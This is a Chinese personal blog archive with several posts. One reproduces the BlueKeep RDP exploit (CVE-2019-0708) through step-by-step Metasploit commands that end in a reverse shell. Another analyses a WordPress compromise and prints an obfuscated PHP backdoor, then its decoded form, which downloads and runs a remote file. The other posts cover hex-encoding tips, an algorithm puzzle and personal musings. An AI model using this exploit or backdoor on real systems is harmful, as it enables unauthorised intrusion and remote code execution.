Monday, October 14, 2019

看不见的「氛围」


我最近一段时间才意识到氛围这个东西的存在,或者说将氛围纳入考虑范围之内。

什么是氛围呢?简单的说是什么场合做什么事。我们人不是机器,是有情绪的,不害臊的说,这是我思考了很长时间才意识到的。

首先,需要阐述一个事实。我们的情绪经常会受到外界环境,不管这个人性格怎么样,是比较内向,还是比较外向,都是会或多或少的受到外界环境/氛围的影响。那么这就导致了我们做一些事情,需要先营造氛围,举个例子:求婚、约会、音乐的前奏。事实上,我们之所以意识不到的存在是因为我们很少会有意识的创造它,大部分情况都是一种无意识的状态。我绞尽脑汁思考有意识的情况,发现有一种情况,就是商家会刻意的去营造这种氛围,比如说音乐、装饰、人流。

那么如果我们有意识去做违背周围氛围的事情会发生什么?自己想吧...

所以说如果没有氛围,我们要有意识的去意识到,并去创建,有氛围之后自然而然情绪就会跟着氛围走了,之后该干啥干啥,跟着身体走就行。不知道你们有没有这种经历,有些事情只有情绪到了一定的高度身体才会去做,要是平时你想刻意的去做的话,不是觉得尴尬就是身体不听使唤,比如说:流泪。


题外话:
其实这完完全全可以反应出人的思维是有局限性的,很多时候,我们会忽视看不见的东西。就好比买电脑吧,很多人张嘴闭嘴要性价比,我一开始也是这样,后面发现了,一个电脑,不完完全全是性价比,做工怎么样,售后怎么样,牌子硬不硬,等等等,这都是看不见的,但确实是实实在在的东西。所以说我们需要更加注意平时看不见的东西,潜意识大概率会忽视。




Wednesday, September 25, 2019

博客从Github Page移植到了Blogspot


为什么要移植

一直用hexo托管在Github上有几点体验不要好的地方
  1. 没有评论系统,虽然有很多插件,但是不能及时的通知提醒
  2. 写博客体验比较不好,虽说这种方式比较极客,Markdown本身语法比较简单,有些复杂的排版需要用html标签来实现,比较难受
  3. 没有后台管理系统,全靠git来管理,方式较极客,但不友好
  4. 更新博客之后需要刷新两次才能更新页面
综上,当时跟风的我现在苦逼的将博客全手工移植到来这里,😢







Saturday, September 7, 2019

CVE-2019-0708漏洞复现


准备操作

Linux

MacOS



1
2
3
4
5
6
7
8
9
10
11
# Download
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

# Replace
sudo cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
sudo cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
sudo cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
sudo cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
注意 还需要关闭系统防火墙 因为用到了反弹Shell

Exploit

开启msfconsole
保险起见执行reload_all
Load module use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
接下来 msf基本操作
查看配置info
设置目标IP set RHOSTS <target ip>
有需要的话需要设置target


1
2
3
4
5
6
7
8
9
Exploit targets:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting
   1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
   2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
最后 run,遇到蓝屏 多试几次 或者 是哪一步配置出错
成功

自己踩的坑


  1. 需要覆盖的文件没有全覆盖到 -> exploit的时候一直蓝屏
  2. 系统防火墙没有关 -> 一直拿不到反弹Shell (没想到竟然会经过防火墙 以为是一个机子的内部操作)

Friday, August 9, 2019

超过35000个WordPress站被攻破事件分析


🐎


1
<?php goto D242; Cfc5: echo "\x61\x75\x78\x36\x54\150\x65\151\157\x47\150\165\x65\x51\x75\63"; goto e83e; f7cc: B487: goto d892; Ff02: chmod($C43e, 0755); goto b30d; e9df: if (empty($B113)) { goto B487; } goto a0b1; B80e: echo "\157\153"; goto f7cc; c76b: if (!($_POST["\143\x70"] == "\144\157\167\x6e\x6c\157\x61\x64")) { goto Ee85; } goto A93f; bdbb: exec("\x70\153\151\x6c\154\40\x2d\71\x20\55\x66\x20\163\x74\x65\141\x6c\x74\150"); goto c200; F9c6: $B113 = $_POST["\x75\162\x6c"]; goto e9df; b30d: $Ab43 = "\56\x2f{$C43e}\x20\76\40\57\144\x65\166\x2f\x6e\x75\154\x6c\x20\62\76\x2f\144\145\x76\x2f\x6e\x75\154\x6c\40\x26"; goto D4a3; e83e: die; goto D223; d875: if (!($_GET["\x63\147"] == "\143\x68\x6b")) { goto F9f0; } goto Cfc5; D223: F9f0: goto c76b; A93f: $C43e = substr(str_shuffle(str_repeat($bf09 = "\60\61\62\x33\x34\65\x36\67\x38\x39\141\x62\143\x64\x65\x66\147\x68\x69\152\153\x6c\x6d\x6e\x6f\x70\161\162\163\164\x75\166\x77\x78\x79\x7a\x41\102\x43\x44\105\x46\107\x48\x49\112\113\x4c\x4d\116\117\120\121\122\123\x54\125\126\127\x58\131\132", ceil(6 / strlen($bf09)))), 1, 6); goto F9c6; F064: $b3e4 = file_get_contents(trim($B113)); goto a92a; D4a3: exec($Ab43); goto B80e; a92a: file_put_contents($C43e, $b3e4); goto Ff02; a0b1: @unlink($C43e); goto bdbb; c200: exec("\160\x6b\x69\154\154\40\x2d\146\x20\x2d\71\40\x73\164\145\141\154\x74\150"); goto F064; D242: error_reporting(0); goto d875; d892: Ee85:

分析后


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
error_reporting(0);
if ($_GET["cg"] == "chk") {
  echo "aux6TheioGhueQu3";
} else if ($_POST["cp"] == "download") {
  $cqQHbAE5XLgs8psC = substr(str_shuffle(str_repeat($ZNPTFf3D_3zXFaNZ = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", ceil(6 / strlen($ZNPTFf3D_3zXFaNZ)))), 1, 6);
  if (!empty($_POST["url"])) {
    @unlink($cqQHbAE5XLgs8psC);
    exec("pkill -9 -f stealth");
    exec("pkill -f -9 stealth");
    $zoUdl1u2MM35rLMf = file_get_contents(trim($_POST["url"]));
    file_put_contents($cqQHbAE5XLgs8psC, $zoUdl1u2MM35rLMf);
    chmod($cqQHbAE5XLgs8psC, 0755);
    $h2mklze53I9MDH0c = "./{$cqQHbAE5XLgs8psC} > /dev/null 2>/dev/null &";
    exec($h2mklze53I9MDH0c);
    echo "ok";
  }
}
?>
我想说对那个挂🐎的人说 你累不累啊你 反正我是很累
我感觉不是机器混淆的 是手工混淆 2个字 NB

分析

这程序很简单

0x01

GET 给一个 cg=chk
很明显是用来确认🐎是否存在的

测试

0x02

POST 给一个
cp=download
url=要下载的地址
首先会杀进程stealth
接下来就会把地址的内容下载下来命名为随机一个名字 给予执行权限并后台执行
最后没有错误的话会输出ok

测试

接下来的操作看自己发挥了
由于有写权限随便写个一句话不是问题
这里写一个phpinfo进去m.php
网页内容

1
2
#!/bin/bash
echo "<?php phpinfo() ?>" > m.php

后续

发现了一些那老哥传的🐎

个人猜测是挖矿的 体积也比较大 是二进制文件

Tuesday, August 6, 2019

Python字符串十六进制编码的破事



刚才做ctf题目发现这种十六进制编码还是挺烦的, 整理一下思绪

1
2
string <-> hex string
string <-> dec integer

彻底解决这些烦人的玩意

string <-> hex string

string -> hex string


1
2
3
4
5
6
# all python version
import binascii
binascii.b2a_hex('string')
binascii.hexlify('string')
# only python2
'string'.encode('hex')

string <- hex string


1
2
3
4
5
6
# all python version
import binascii
binascii.a2b_hex('737472696e67')
binascii.unhexlify('737472696e67')
# only python2
'737472696e67'.decode('hex')

string <-> dec integer

string -> dec integer


1
2
# string -> hex string -> integer
int(binascii.hexlify('string'), 16)

string <- dec integer


1
2
3
# integer -> hex string -> string
binascii.unhexlify('%x' % 126943972912743)
binascii.unhexlify('{0:x}'.format(126943972912743))

Reference

Thursday, May 16, 2019

算法题-BAT最小交换次数


题目

IT产业人才需求节节攀升。业内巨头百度、阿里巴巴、腾讯(简称BAT)在某海滩进行招聘活动。
招聘部门一字排开。由于是自由抢占席位,三大公司的席位随机交错在一起,形如:
ABABTATT,这使得应聘者十分别扭。
于是,管理部门要求招聘方进行必要的交换位置,使得每个集团的席位都挨在一起。即最后形如:
BBAAATTT 这样的形状,当然,也可能是:
AAABBTTT 等。
现在,假设每次只能交换2个席位,并且知道现在的席位分布,
你的任务是计算:要使每个集团的招聘席位都挨在一起需要至少进行多少次交换动作。
输入是一行n个字符(只含有字母B、A或T),表示现在的席位分布。
输出是一个整数,表示至少交换次数。
比如,输入:
TABTABBTTTT
程序应该输出:
3
再比如,输入:
TTAAABB
程序应该输出:
0
我们约定,输入字符串的长度n 不大于10万
资源约定:
峰值内存消耗(含虚拟机) < 256M
CPU消耗 < 1000ms

思路

最后的形态情况可能有6种, 分别BAT的全排序
所以如何确定最后的形态呢, 我的想法是在6种情况中与输入比较, 取最少不通字符的那个形态
确定了最后的形态, 接下来就要考虑, 如何交换
交换的情况肯定有两种
  1. 交换后各自都正好到达各自的位置
  2. 交换后只有一个字符到达了自己的位置
参考下面的Reference, 我们可以用环来思考, 最后的交换次数就是字符数减去组成的环数
..说的感觉不是很清楚, 自己都不知道咋说了

代码


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#include <bits/stdc++.h>
using namespace std;

int main() {
    ios::sync_with_stdio(0);
    cin.tie(0);

    string s;
    while (cin >> s) {
        int cnt[256] = {0};
        for (char c : s) {
            ++cnt[c];
        }

        string d = "BAT";
        sort(d.begin(), d.end());

        int min_d = s.size(); // 最小的字符不同数
        string min_s; // 最后的形态
        do {
            int k = 0, diff = 0;
            for (int i = 0; i < 3; ++i) {
                for (int j = 0; j < cnt[d[i]]; ++j, ++k) {
                    if (s[k] != d[i]) {
                        ++diff;
                    }
                }
            }
            if (diff < min_d) {
                min_d = diff;
                min_s = d;
            }
        } while(next_permutation(d.begin(), d.end())); // BAT的全排列

        int part_cnt[3][256] = {0};
        for (int i = 0, k = 0; i < 3; ++i) {
            for (int j = 0; j < cnt[min_s[i]]; ++j, ++k) {
                ++part_cnt[i][s[k]];
            }
        }

        int ans = min_d;
        int left = 0; // 剩下需要3个分区一起交换的字符
        for (int i = 0; i < 3; ++i) {
            for (int j = 0; j < i; ++j) {
                ans -= min(part_cnt[i][min_s[j]], part_cnt[j][min_s[i]]); // 减去可以两两交换同时到达各自位置的字符
                left += abs(part_cnt[i][min_s[j]] - part_cnt[j][min_s[i]]); // 加上不能两两交换同时到达的字符
            }
        }
        ans -= (left / 3); // 3个字符够成一个环
        cout << ans << endl;
    }


    return 0;
}

Reference